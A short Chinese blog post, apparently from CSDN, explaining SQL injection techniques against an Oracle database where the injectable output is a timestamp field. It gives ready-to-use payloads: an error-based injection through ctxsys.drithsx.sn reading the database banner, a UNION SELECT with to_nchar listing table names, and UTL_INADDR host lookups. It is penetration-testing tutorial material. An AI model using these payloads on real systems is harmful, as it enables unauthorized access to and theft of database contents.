当前位置：网站首页>对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)

对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)

2022-07-31 05:10:00 【不习惯有你】

注意：仅用于技术讨论，切勿用于其他用途，一切后果与本人无关。

解决方法：

1.盲注

2.尝试报错注入

and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))

3.尝试去转化类型

to_nchar 转化为varchar或varchar2类型

用法to_nchar(table_name)

and 1=2 union select null,null,to_nchar(table_name),null from user_tables

4.通过函数对字符处理转化为数字

切割字符串，转数字看回显

由于有字数要求，我看了一些其他的报错函数

1.UTL_INADDR.get_host_address环境中IP地址

具体用法：select UTL_INADDR.get_host_address（'www.qq.com'） from dual;

2.UTL_INADDR.get_host_name返回环境中主机名

具体用法：

返回局域网内指定IP地址的主机名

select UTL_INADDR.get_host_name（'192.168.0.156'） from dual;

返回intrenet中指定IP地址的网址

select UTL_INADDR.get_host_name（'219.153.50.84'） from dual;

版权声明
本文为[不习惯有你]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_58000413/article/details/125662269